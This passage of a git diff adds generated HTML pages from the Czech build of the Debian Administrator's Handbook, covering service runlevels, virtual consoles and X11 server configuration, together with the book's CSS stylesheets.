+                  class="refentrytitle">update-rc.d</span>(1)</span> manual page describes the syntax in detail. Please note that removing all symbolic links (with the <code
+                class="literal">remove</code> parameter) is not a good method to disable a service. Instead you should simply configure it to not start in the desired runlevel (while preserving the corresponding calls to stop it in the event that the service runs in the previous runlevel). Since <code
+                class="command">update-rc.d</code> has a somewhat convoluted interface, you may prefer using <code
+                class="command">rcconf</code> (from the <span
+                class="pkg pkg">rcconf</span> package) which provides a more user-friendly interface.
+			</div><a
+              id="id-1.12.4.7.17"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DEBIAN POLICY</em></span> Restarting services</strong></p></div></div></div><a
+                id="id-1.12.4.7.18.2"
+                class="indexterm"></a><a
+                id="id-1.12.4.7.18.3"
+                class="indexterm"></a><a
+                id="id-1.12.4.7.18.4"
+                class="indexterm"></a><div
+                class="para">
+				The maintainer scripts for Debian packages will sometimes restart certain services to ensure their availability or get them to take certain options into account. The command that controls a service — <code
+                  class="command">service <em
+                    class="replaceable">service</em> <em
+                    class="replaceable">operation</em></code> — doesn't take runlevel into consideration, assumes (wrongly) that the service is currently being used, and may thus initiate incorrect operations (starting a service that was deliberately stopped, or stopping a service that is already stopped, etc.). Debian therefore introduced the <code
+                  class="command">invoke-rc.d</code> program: this program must be used by maintainer scripts to run services initialization scripts and it will only execute the necessary commands. Note that, contrary to common usage, the <code
+                  class="filename">.d</code> suffix is used here in a program name, and not in a directory.
+			</div></div><div
+              class="para">
+				Finally, <code
+                class="command">init</code> starts control programs for various virtual consoles (<code
+                class="command">getty</code>). It displays a prompt, waiting for a username, then executes <code
+                class="command">login <em
+                  class="replaceable">user</em></code> to initiate a session.
+			</div><a
+              id="id-1.12.4.7.20"
+              class="indexterm"></a><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>VOCABULARY</em></span> Console and terminal</strong></p></div></div></div><div
+                class="para">
+				The first computers were usually separated into several, very large parts: the storage enclosure and the central processing unit were separate from the peripheral devices used by the operators to control them. These were part of a separate furniture, the “console”. This term was retained, but its meaning has changed. It has become more or less synonymous with “terminal”, being a keyboard and a screen.
+			</div><div
+                class="para">
+				With the development of computers, operating systems have offered several virtual consoles to allow for several independent sessions at the same time, even if there is only one keyboard and screen. Most GNU/Linux systems offer six virtual consoles (in text mode), accessible by typing the key combinations <span
+                  class="keycap"><strong>Control</strong></span>+<span
+                  class="keycap"><strong>Alt</strong></span>+<span
+                  class="keycap"><strong>F1</strong></span> through <span
+                  class="keycap"><strong>Control</strong></span>+<span
+                  class="keycap"><strong>Alt</strong></span>+<span
+                  class="keycap"><strong>F6</strong></span>.
+			</div><div
+                class="para">
+				By extension, the terms “console” and “terminal” can also refer to a terminal emulator in a graphical X11 session (such as <code
+                  class="command">xterm</code>, <code
+                  class="command">gnome-terminal</code> or <code
+                  class="command">konsole</code>).
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.kernel-installation.html"><strong>Předcházející</strong>8.11. Installing a Kernel</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.remote-login.html"><strong>Další</strong>9.2. Remote Login</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/website.html b/publish/cs-CZ/Debian/9/html/debian-handbook/website.html
new file mode 100644
index 000000000..d5be34c6e
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/website.html
@@ -0,0 +1,91 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha D. Get the book</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="backcover.html"
+        title="Příloha C. The Debian Administrator's Handbook" /><link
+        rel="next"
+        href="sect.download-the-electronic-version.html"
+        title="D.2. Download the electronic version" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/website.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="backcover.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-electronic-version.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="website"></a>Příloha D. Get the book</h1></div></div></div><div
+          class="para">
+		Before going further, if you want to make up your mind about the book, you're invited to <a
+            href="https://debian-handbook.info/browse/en-US/stable/">browse the online version</a>.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.buy-the-paperback"></a>D.1. Buy the English Paperback</h2></div></div></div><div
+            class="para">
+			The paperback is available through Lulu's print-on-demand service at a price of €44.90 (without VAT and shipping). <a
+              href="">Click here to view the book details on Lulu.com</a>. Click on the button below to buy it directly.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="backcover.html"><strong>Předcházející</strong>Příloha C. The Debian Administrator's Handbook</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.download-the-electronic-version.html"><strong>Další</strong>D.2. Download the electronic version</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html b/publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html
new file mode 100644
index 000000000..208138fa4
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/workstation.html
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 13. Workstation</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.monitoring.html"
+        title="12.4. Monitoring" /><link
+        rel="next"
+        href="sect.customizing-graphical-interface.html"
+        title="13.2. Customizing the Graphical Interface" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/workstation.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.monitoring.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.customizing-graphical-interface.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="workstation"></a>Kapitola 13. Workstation</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="workstation.html#sect.x11-server-configuration">13.1. Configuring the X11 Server</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.customizing-graphical-interface.html">13.2. Customizing the Graphical Interface</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html#id-1.16.5.2">13.2.1. Choosing a Display Manager</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html#id-1.16.5.3">13.2.2. Choosing a Window Manager</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.customizing-graphical-interface.html#id-1.16.5.4">13.2.3. Menu Management</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.graphical-desktops.html">13.3. Graphical Desktops</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html#sect.gnome-desktop">13.3.1. GNOME</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html#id-1.16.6.13">13.3.2. KDE and Plasma</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.graphical-desktops.html#id-1.16.6.14">13.3.3. Xfce and Others</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.main-desktop-tools.html">13.4. Email</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html#id-1.16.7.3">13.4.1. Evolution</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html#id-1.16.7.4">13.4.2. KMail</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.main-desktop-tools.html#id-1.16.7.5">13.4.3. Thunderbird and Icedove</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.web-browsers.html">13.5. Web Browsers</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.development.html">13.6. Development</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.development.html#id-1.16.9.2">13.6.1. Tools for GTK+ on GNOME</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.development.html#id-1.16.9.3">13.6.2. Tools for Qt</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.collaborative-work.html">13.7. Collaborative Work</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.collaborative-work.html#id-1.16.10.3">13.7.1. Working in Groups: <span
+                        class="foreignphrase"><em
+                          class="foreignphrase">groupware</em></span></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.collaborative-work.html#id-1.16.10.4">13.7.2. Collaborative Work With FusionForge</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.office-suites.html">13.8. Office Suites</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.windows-emulation.html">13.9. Emulating Windows: Wine</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.rtc-clients.html">13.10. Real-Time Communications software</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		Now that server deployments are done, the administrators can focus on installing the individual workstations and creating a typical configuration.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.x11-server-configuration"></a>13.1. Configuring the X11 Server</h2></div></div></div><a
+            id="id-1.16.4.2"
+            class="indexterm"></a><a
+            id="id-1.16.4.3"
+            class="indexterm"></a><a
+            id="id-1.16.4.4"
+            class="indexterm"></a><a
+            id="id-1.16.4.5"
+            class="indexterm"></a><div
+            class="para">
+			The initial configuration for the graphical interface can be awkward at times; very recent video cards often don't work perfectly with the X.org version shipped in the Debian stable version.
+		</div><div
+            class="para">
+			A brief reminder: X.org is the software component that allows graphical applications to display windows on screen. It includes a driver that makes efficient use of the video card. The features offered to the graphical applications are exported through a standard interface, <span
+              class="emphasis"><em>X11</em></span> (<span
+              class="distribution distribution">Stretch</span> contains version <span
+              class="emphasis"><em>X11R7.7</em></span>).
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>PERSPECTIVE</em></span> X11, XFree86 and X.org</strong></p></div></div></div><div
+              class="para">
+			X11 is the graphical system most widely used on Unix-like systems (also available for Windows and Mac OS). Strictly speaking, the term “X11” only refers to a protocol specification, but it is also used to refer to the implementation in practice.
+		</div><div
+              class="para">
+			X11 had a rough start, but the 1990s saw XFree86 emerge as the reference implementation because it was free software, portable, and maintained by a collaborative community. However, the rate of evolution slowed down near the end when the software only gained new drivers. That situation, along with a very controversial license change, led to the X.org fork in 2004. This is now the reference implementation, and Debian <span
+                class="distribution distribution">Stretch</span> uses X.org version 7.7.
+		</div></div><div
+            class="para">
+			Current versions of X.org are able to autodetect the available hardware: this applies to the video card and the monitor, as well as keyboards and mice; in fact, it is so convenient that the package no longer even creates a <code
+              class="filename">/etc/X11/xorg.conf</code> configuration file.
+		</div><a
+            id="id-1.16.4.10"
+            class="indexterm"></a><div
+            class="para">
+			The keyboard configuration is currently set up in <code
+              class="filename">/etc/default/keyboard</code>. This file is used both to configure the text console and the graphical interface, and it is handled by the <span
+              class="pkg pkg">keyboard-configuration</span> package. Details on configuring the keyboard layout are available in <a
+              class="xref"
+              href="basic-configuration.html#sect.keyboard-config">8.1.2 – „Configuring the Keyboard“</a>.
+		</div><div
+            class="para">
+			The <span
+              class="pkg pkg">xserver-xorg-core</span> package provides a generic X server, as used by the 7.x versions of X.org. This server is modular and uses a set of independent drivers to handle the many different kinds of video cards. Installing <span
+              class="pkg pkg">xserver-xorg</span> ensures that both the server and at least one video driver are installed.
+		</div><a
+            id="id-1.16.4.13"
+            class="indexterm"></a><a
+            id="id-1.16.4.14"
+            class="indexterm"></a><div
+            class="para">
+			Note that if the detected video card is not handled by any of the available drivers, X.org tries using the VESA and fbdev drivers. VESA is a generic driver that should work everywhere, but with limited capabilities (fewer available resolutions, no hardware acceleration for games and visual effects for the desktop, and so on) while fbdev works on top of the kernel's framebuffer device. Nowadays the X server runs without any administrative privileges (this used to be required to be able to configure the screen) and thus its log file is now stored in the user's home directory in <code
+              class="filename">~/.local/share/xorg/Xorg.0.log</code> (whereas it used to be in <code
+              class="filename">/var/log/Xorg.0.log</code> for versions older than <span
+              class="distribution distribution">Stretch</span>). That log file is where one would look to know what driver is currently in use. For example, the following snippet matches what the <code
+              class="literal">intel</code> driver outputs when it is loaded:
+		</div><pre
+            class="programlisting">
+(==) Matched intel as autoconfigured driver 0
+(==) Matched modesetting as autoconfigured driver 1
+(==) Matched vesa as autoconfigured driver 2
+(==) Matched fbdev as autoconfigured driver 3
+(==) Assigned the driver to the xf86ConfigLayout
+(II) LoadModule: "intel"
+(II) Loading /usr/lib/xorg/modules/drivers/intel_drv.so
+</pre><a
+            id="id-1.16.4.17"
+            class="indexterm"></a><a
+            id="id-1.16.4.18"
+            class="indexterm"></a><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>EXTRA</em></span> Proprietary drivers</strong></p></div></div></div><div
+              class="para">
+			Some video card makers (most notably nVidia) refuse to publish the hardware specifications that would be required to implement good free drivers. They do, however, provide proprietary drivers that allow using their hardware. This policy is nefarious, because even when the provided driver exists, it is usually not as polished as it should be; more importantly, it does not necessarily follow the X.org updates, which may prevent the latest available driver from loading correctly (or at all). We cannot condone this behavior, and we recommend you avoid these makers and favor more cooperative manufacturers.
+		</div><div
+              class="para">
+			If you still end up with such a card, you will find the required packages in the <span
+                class="emphasis"><em>non-free</em></span> section: <span
+                class="pkg pkg">nvidia-driver</span> for nVidia cards. It requires a matching kernel module. Building the module can be automated by installing the package <span
+                class="pkg pkg">nvidia-kernel-dkms</span> (for nVidia).
+		</div><div
+              class="para">
+			The “nouveau” project aims to develop a free software driver for nVidia cards and is the default driver that you get for nVidia cards in Debian. As of <span
+                class="distribution distribution">Stretch</span>, its feature set and performance do not match the proprietary driver. In the developers' defense, we should mention that the required information can only be gathered by reverse engineering, which makes things difficult. The free driver for ATI video cards, called “radeon”, is much better in that regard although it often requires non-free firmware.
+		</div><a
+              id="id-1.16.4.19.5"
+              class="indexterm"></a><a
+              id="id-1.16.4.19.6"
+              class="indexterm"></a></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.monitoring.html"><strong>Předcházející</strong>12.4. Monitoring</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.customizing-graphical-interface.html"><strong>Další</strong>13.2. Customizing the Graphical Interface</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/Common_Content/css/brand.css b/tmp/cs-CZ/html/Common_Content/css/brand.css
new file mode 100644
index 000000000..d86cba937
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/brand.css
@@ -0,0 +1,14 @@
+/*headings*/
+h1, h2, h3, h4, h5, h6,
+div.producttitle,
+div.subtitle,
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib,
+.title,
+.titlepage .edition,
+.titlepage .releaseinfo {
+	color: #336699;
+}
diff --git a/tmp/cs-CZ/html/Common_Content/css/common.css b/tmp/cs-CZ/html/Common_Content/css/common.css
new file mode 100644
index 000000000..d87ec69f5
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/css/common.css
@@ -0,0 +1,1740 @@
+* {
+	widows: 4 !important;
+	orphans: 4 !important;
+}
+
+body, h1, h2, h3, h4, h5, h6, pre, li, div {
+	line-height: 1.29em;
+}
+
+body {
+	background-color: white;
+	margin:0 auto;
+	font-family: "liberation sans", "Myriad ", "Bitstream Vera Sans", "Lucida Grande", "Luxi Sans", "Trebuchet MS", helvetica, verdana, arial, sans-serif;
+	font-size: 14px;
+	max-width: 770px;
+	color: black;
+}
+
+body.toc_embeded {
+	/*for web hosting system only*/
+	margin-left: 300px;
+}
+
+object.toc, iframe.toc {
+	/*for web hosting system only*/
+	border-style: none;
+	position: fixed;
+	width: 290px;
+	height: 99.99%;
+	top: 0;
+	left: 0;
+	z-index: 100;
+	border-style: none;
+	border-right:1px solid #999;
+}
+
+/* Hide web menu */
+
+body.notoc {
+	margin-left: 3em;
+}
+
+iframe.notoc {
+	border-style:none;
+	border: none;
+	padding: 0px;
+	position:fixed;
+	width: 21px;
+	height: 29px;
+	top: 0px;
+	left:0;
+	overflow: hidden;
+	margin: 0px;
+	margin-left: -3px;
+}
+/* End hide web menu */
+
+/* desktop styles */
+body.desktop {
+	margin-left: 26em;
+}
+
+body.desktop .book > .toc {
+	display:block;
+	width:24em;
+	height:99.99%;
+	position:fixed;
+	overflow:auto;
+	top:0px;
+	left:0px;
+/*	padding-left:1em; */
+	background-color:#EEEEEE;
+	font-size: 12px;
+}
+
+body.pdf {
+	max-width: 100%;
+}
+
+.toc {
+	line-height:1.35em;
+}
+
+.toc .glossary,
+.toc .chapter, .toc .appendix {
+	margin-top:1em;
+}
+
+.toc .part {
+	margin-top:1em;
+	display:block;
+}
+
+span.glossary,
+span.appendix {
+	display:block;
+	margin-top:0.5em;
+}
+
+div {
+	padding-top:0px;
+}
+
+div.section {
+}
+
+p, div.para {
+	padding-top: 0px;
+	margin-top: 1em;
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+}
+
+div.formalpara {
+	padding-top: 0px;
+	margin-top: 1em;
+	padding-bottom: 0px;
+	margin-bottom: 1em;
+}
+
+.varlistentry div.para {
+
+}
+
+/*Links*/
+a {
+	outline: none;
+}
+
+a:link {
+	text-decoration: none;
+	border-bottom: 1px dotted ;
+	color:#3366cc;
+}
+
+body.pdf a:link {
+	word-wrap: break-word;
+}
+
+a:visited {
+	text-decoration:none;
+	border-bottom: 1px dotted ;
+	color:#003366;
+}
+
+div.longdesc-link {
+	float:right;
+	color:#999;
+}
+
+.toc a, .qandaset a {
+	font-weight:normal;
+	border:none;
+}
+
+.toc a:hover, .qandaset a:hover
+{
+	border-bottom: 1px dotted;
+}
+
+/*headings*/
+h1, h2, h3, h4, h5, h6 {
+	color: #336699;
+	margin-top: 0px;
+	margin-bottom: 0px;
+	background-color: transparent;
+	margin-bottom: 0px;
+	margin-top: 20px;
+	word-wrap: break-word;
+}
+
+h1 {
+	font-size: 22px;
+}
+
+.titlepage h1.title {
+	text-align:left;
+}
+
+.book > .titlepage h1.title {
+	text-align: center;
+}
+
+.article > .titlepage h1.title,
+.article > .titlepage h2.title {
+	text-align: center;
+}
+
+.set .titlepage > div > div > h1.title {
+	text-align: center;
+}
+
+.part > .titlepage h1.title {
+	text-align: center;
+	font-size: 24px;
+}
+
+div.producttitle {
+	margin-top: 0px;
+	margin-bottom: 20px;
+	font-size: 48px;
+	font-weight: bold;
+/* 	background: #003d6e url(../images/h1-bg.png) top left repeat-x; */
+	color:  #336699;
+	text-align: center;
+	padding-top: 12px;
+}
+
+.titlepage .corpauthor {
+	margin-top: 1em;
+	text-align: center;
+}
+
+.section h1.title {
+	font-size: 18px;
+	padding: 0px;
+	color: #336699;
+	text-align: left;
+	background: white;
+}
+
+h2 {
+	font-size: 20px;
+	margin-top: 30px;
+}
+
+
+.book div.subtitle, .book h2.subtitle, .book h3.subtitle {
+	margin-top: 1em;
+	margin-bottom: 1em;
+	font-size: 18px;
+	text-align: center;
+}
+
+div.subtitle {
+	color:  #336699;
+	font-weight: bold;
+}
+
+h1.legalnotice {
+	font-size: 24px;
+}
+
+.preface > div > div > div > h2.title,
+.preface > div > div > div > h1.title {
+	margin-top: 1em;
+	font-size: 24px;
+}
+
+.appendix h2 {
+	font-size: 24px;
+}
+
+
+
+h3 {
+	font-size: 14px;
+	padding-top:0px;
+	padding-bottom: 0px;
+	margin-bottom: 0px;
+}
+h4 {
+	font-size: 14px;
+	padding-top:0px;
+	padding-bottom:0px;
+}
+
+h5 {
+	font-size: 14px;
+}
+
+h6 {
+	font-size: 14px;
+	margin-bottom: 0px;
+}
+
+.abstract h6 {
+	margin-top:1em;
+	margin-bottom:.5em;
+	font-size: 24px;
+}
+
+.index > div > div > div > h2.title {
+	font-size: 24px;
+}
+
+.chapter > div > div > div > h2.title {
+	font-size: 24px;
+}
+
+.section > div > div > div > h2.title {
+	font-size: 21px;
+}
+
+.section > div > div > div > h3.title {
+	font-size: 17px;
+}
+
+/*element rules*/
+hr {
+	border-collapse: collapse;
+	border-style:none;
+	border-top: 1px dotted #ccc;
+	width:100%;
+}
+
+/* web site rules */
+ul.languages, .languages li {
+	display:inline;
+	padding:0px;
+}
+
+.languages li a {
+	padding:0px .5em;
+	text-decoration: none;
+}
+
+.languages li p, .languages li div.para {
+	display:inline;
+}
+
+.languages li a:link, .languages li a:visited {
+	color:#444;
+}
+
+.languages li a:hover, .languages li a:focus, .languages li a:active {
+	color:black;
+}
+
+ul.languages {
+	display:block;
+	background-color:#eee;
+	padding:.5em;
+}
+
+/*supporting stylesheets*/
+
+/*unique to the webpage only*/
+.books {
+	position:relative;
+}
+
+.versions li {
+	width:100%;
+	clear:both;
+	display:block;
+}
+
+a.version {
+	font-size: 20px;
+	text-decoration:none;
+	width:100%;
+	display:block;
+	padding:1em 0px .2em 0px;
+	clear:both;
+}
+
+a.version:before {
+	content:"Version";
+	font-size: smaller;
+}
+
+a.version:visited, a.version:link {
+	color:#666;
+}
+
+a.version:focus, a.version:hover {
+	color:black;
+}
+
+.books {
+	display:block;
+	position:relative;
+	clear:both;
+	width:100%;
+}
+
+.books li {
+	display:block;
+	width:200px;
+	float:left;
+	position:relative;
+	clear: none ;
+}
+
+.books .html {
+	width:170px;
+	display:block;
+}
+
+.books .pdf {
+	position:absolute;
+	left:170px;
+	top:0px;
+	font-size: smaller;
+}
+
+.books .pdf:link, .books .pdf:visited {
+	color:#555;
+}
+
+.books .pdf:hover, .books .pdf:focus {
+	color:#000;
+}
+
+.books li a {
+	text-decoration:none;
+}
+
+.books li a:hover {
+	color:black;
+}
+
+/*products*/
+.products li {
+	display: block;
+	width:300px;
+	float:left;
+}
+
+.products li a {
+	width:300px;
+	padding:.5em 0px;
+}
+
+.products ul {
+	clear:both;
+}
+
+/*revision history*/
+.revhistory {
+	display:block;
+}
+
+.revhistory table {
+	background-color:transparent;
+	border-color:#fff;
+	padding:0px;
+	margin: 0;
+	border-collapse:collapse;
+	border-style:none;
+}
+
+.revhistory td {
+	text-align :left;
+	padding:0px;
+	border: none;
+	border-top: 1px solid #fff;
+	font-weight: bold;
+}
+
+.revhistory .simplelist td {
+	font-weight: normal;
+}
+
+.revhistory .simplelist {
+	margin-bottom: 1.5em;
+	margin-left: 1em;
+}
+
+.revhistory table th {
+	display: none;
+}
+
+
+/*credits*/
+.authorgroup div {
+	clear:both;
+	text-align: center;
+}
+
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib {
+	margin: 0px;
+	padding: 0px;
+	margin-top: 12px;
+	font-size: 14px;
+	font-weight: bold;
+	color: #336699;
+}
+
+div.editedby {
+	margin-top: 15px;
+	margin-bottom: -0.8em;
+}
+
+div.authorgroup .author, 
+div.authorgroup.editor, 
+div.authorgroup.translator, 
+div.authorgroup.othercredit,
+div.authorgroup.contrib {
+	display: block;
+	font-size: 14px;
+}
+
+.revhistory .author {
+	display: inline;
+}
+
+.othercredit h3 {
+	padding-top: 1em;
+}
+
+
+.othercredit {
+	margin:0px;
+	padding:0px;
+}
+
+.releaseinfo {
+	clear: both;
+}
+
+.copyright {
+	margin-top: 1em;
+}
+
+/* qanda sets */
+.answer {
+	margin-bottom:1em;
+	border-bottom:1px dotted #ccc;
+}
+
+.qandaset .toc {
+	border-bottom:1px dotted #ccc;
+}
+
+.question {
+	font-weight:bold;
+}
+
+.answer .data, .question .data {
+	padding-left: 2.6em;
+}
+
+.answer .label, .question .label {
+	float:left;
+	font-weight:bold;
+}
+
+/* inline syntax highlighting */
+.perl_Alert {
+	color: #0000ff;
+}
+
+.perl_BaseN {
+	color: #007f00;
+}
+
+.perl_BString {
+	color: #5C3566;
+}
+
+.perl_Char {
+	color: #ff00ff;
+}
+
+.perl_Comment {
+	color: #888888;
+}
+
+
+.perl_DataType {
+	color: #0000ff;
+}
+
+
+.perl_DecVal {
+	color: #00007f;
+}
+
+
+.perl_Error {
+	color: #ff0000;
+}
+
+
+.perl_Float {
+	color: #00007f;
+}
+
+
+.perl_Function {
+	color: #007f00;
+}
+
+
+.perl_IString {
+	color: #5C3566;
+}
+
+
+.perl_Keyword {
+	color: #002F5D;
+}
+
+
+.perl_Operator {
+	color: #ffa500;
+}
+
+
+.perl_Others {
+	color: #b03060;
+}
+
+
+.perl_RegionMarker {
+	color: #96b9ff;
+}
+
+
+.perl_Reserved {
+	color: #9b30ff;
+}
+
+
+.perl_String {
+	color: #5C3566;
+}
+
+
+.perl_Variable {
+	color: #0000ff;
+}
+
+
+.perl_Warning {
+	color: #0000ff;
+}
+
+/*Lists*/
+ul {
+    list-style-image: url("../images/dot.png");
+    list-style-type: circle;
+    padding-left: 1.6em;
+}
+
+ul ul {
+    list-style-image: url("../images/dot2.png");
+    list-style-type: circle;
+}
+
+ol.1 {
+	list-style-type: decimal;
+}
+
+ol.a,
+ol ol {
+	list-style-type: lower-alpha;
+}
+
+ol.i {
+	list-style-type: lower-roman;
+}
+ol.A {
+	list-style-type: upper-alpha;
+}
+
+ol.I {
+	list-style-type: upper-roman;
+}
+
+dt {
+	font-weight:bold;
+	margin-bottom:0px;
+	padding-bottom:0px;
+}
+
+dd {
+	margin:0px;
+	margin-left:2em;
+	padding-top:0px;
+}
+
+li {
+	padding-top: 0px;
+	margin-top: 0px;
+	padding-bottom: 0px;
+/*	margin-bottom: 16px; */
+}
+
+/*images*/
+img {
+	display:block;
+	margin: 2em 0;
+	max-width: 100%;
+}
+
+.inlinemediaobject,
+.inlinemediaobject img,
+.inlinemediaobject object {
+	display:inline;
+	margin:0px;
+	overflow: hidden;
+}
+
+.figure {
+    margin-top: 1em;
+    width: 100%;
+}
+
+.figure img,
+.mediaobject img {
+	display:block;
+	margin: 0em;
+}
+
